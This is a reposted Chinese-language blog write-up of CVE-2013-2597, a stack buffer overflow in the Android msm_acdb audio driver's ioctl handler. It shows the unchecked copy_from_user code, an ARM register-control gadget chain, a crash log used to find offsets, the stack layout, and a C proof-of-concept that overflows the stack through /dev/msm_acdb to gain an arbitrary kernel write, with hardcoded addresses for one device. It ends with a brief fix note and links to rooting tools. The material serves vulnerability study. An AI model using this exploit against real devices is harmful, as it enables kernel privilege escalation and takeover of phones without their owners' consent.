Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)

转:http://blog.csdn.net/hu3167343/article/details/36016193

/*

本文章由 莫灰灰 编写,转载请注明出处。  

作者:莫灰灰    邮箱: [email protected]

*/

1. 漏洞描述

音频驱动acdb提供了一个ioctl的系统接口让应用层调用,然而,其在处理传进来的参数时没有做有效的边界检查。应用程序可以通过/dev/msm_acdb设备文件就能达到提升权限的目的。


2. 漏洞分析

原始代码如下
if (size <= 0) {
	pr_err("%s: Invalid size sent to driver: %d\n",
		__func__, size);
	result = -EFAULT;
	goto done;
}

if (copy_from_user(data, (void *)(arg + sizeof(size)), size)) {

	pr_err("%s: fail to copy table size %d\n", __func__, size);
	result = -EFAULT;
	goto done;
}
acdb驱动在处理ioctl的时候,只对输入的参数大小做了size<=0的判断,而没有做>的判断,紧接着,copy_from_user(data, (void *)(arg + sizeof(size)), size)的调用造成局部变量data的栈溢出。
 
 
3. 漏洞利用
1.原来的流程 - do_vfs_ioctl调用acdb_ioctl后返回 
  
  
  
  
[plain] view plain copy
  1. do_vfs_ioctl:  
  2. STMPW [SP], { R4-R9, LR }  
  3. ...  
  4. BL acdb_ioctl  
  5. ...  
  6. ADD SP, SP, #$44 // (2)  
  7. LDMUW [SP], { R4-R9, PC } // (1)  
2.acdb_ioctl其中一段,可以获得控制PC的机会。修改寄存器的位置是 (3),这里可以操作R4-PC的所有数值了

  
  
  
  
[plain] view plain copy
  1. acdb_ioctl:  
  2. ...  
  3. ADD SP, SP, #$84  
  4. LDMUW [SP], { R4-R11, PC } // (3)  
通过栈溢出,修改R5,R9,PC的值。
 3.上面的指令,通过堆栈溢出,控制PC的值,跳转到下面代码执行

  
  
  
  
[plain] view plain copy
  1. STR R5, [R9] // (4)  
  2. LDMUW [SP], { R4-R10, PC } // (5)  
此处非常关键,主要通过STR指令,将R5的值设置到R9的地址中,即通过栈溢出达到任意地址写的目的。
 
4.执行(5)之后,为了堆栈平衡,栈要填充 4*8 字节,然后设置下一跳的PC,即返回到(2)那里去

  
  
  
  
[plain] view plain copy
  1. ADD SP, SP, #$24 // (6)  
  2. LDMUW [SP], { R4-R9, PC }  
5.实际栈的位置和p->data的位置需要硬编码适配。
p->data[...]的値需要初始化的时候设置。
硬编码的地址请在pc上通过崩溃的日志分析。
p->data[i]=i 这样来试探(注:给数据标上相对偏移,方便通过栈来定位),这个例子中,PC在&p->data[0x9c]的位置。
例:
  
  
  
  
[plain] view plain copy
  1. ACDB=> ACDB ioctl not found!  
  2. Unable to handle kernel paging request at virtual address 9f9e9d9c  
  3. pgd = df56c000  
  4. [9f9e9d9c] *pgd=00000000  
  5. Internal error: Oops: 80000005 [#1] PREEMPT SMP  
  6. Modules linked in:  
  7. CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1)  
  8. PC is at 0x9f9e9d9c  
  9. LR is at acdb_ioctl+0x740/0x860  
6.设置好堆栈布局

  
  
  
  
[plain] view plain copy
  1. ((unsigned int)&p->data[0x80]) = value;     //r5: PC - 4*7  
  2. ((unsigned int)&p->data[0x90]) = address;   //r9: PC - 4*3  
  3. ((unsigned int)&p->data[0x9c]) = (4)的地址; //pc: PC  
  4. ((unsigned int)&p->data[0xbc]) = (6)地址;   //pc: PC + 4*8  
4. PoC
  
  
  
  
[cpp] view plain copy
  1. static int  
  2. write_value(const acdb_param *param, unsigned long address, unsigned long value)  
  3. {  
  4.     const char *device_name = "/dev/msm_acdb";  
  5.     struct acdb_ioctl arg;  
  6.   
  7.     int fd;  
  8.     int ret;  
  9.     int i;  
  10.   
  11.     fd = open(device_name, O_RDONLY);  
  12.     if (fd < 0) {  
  13.       ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));  
  14.       return -1;  
  15.     }  
  16.   
  17.     arg.size = param->pc2.pos + 4;  
  18.   
  19.     for (i = 0; i < arg.size; i += 4) {  
  20.       *(unsigned long int *)&arg.data[i] = i;  
  21.     }  
  22.   
  23.     *(unsigned long int *)&arg.data[param->address_pos] = address; // R9<span style="white-space:pre"> </span>  
  24.     *(unsigned long int *)&arg.data[param->value_pos] = value; // R5  
  25.     *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; //   
  26.     *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; //  
  27.   
  28.     ret = ioctl(fd, 9999, &arg); // 随意触发一个ioctl,造成堆栈溢出,使得任意地址写入漏洞的触发  
  29.     close(fd);  
  30.   
  31.     return 0;  
  32. }  
其中,param的值对应如下:
  
  
  
  
[cpp] view plain copy
  1. { DEVICE_SO05D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },  


5.漏洞修复
增加了对size上限的控制
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)_第1张图片
参考文章:
http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html
https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597
https://gist.github.com/fi01/5857693
https://github.com/android-rooting-tools/android_run_root_shell 

你可能感兴趣的:(Stack-based buffer overflow in acdb audio driver (CVE-2013-2597))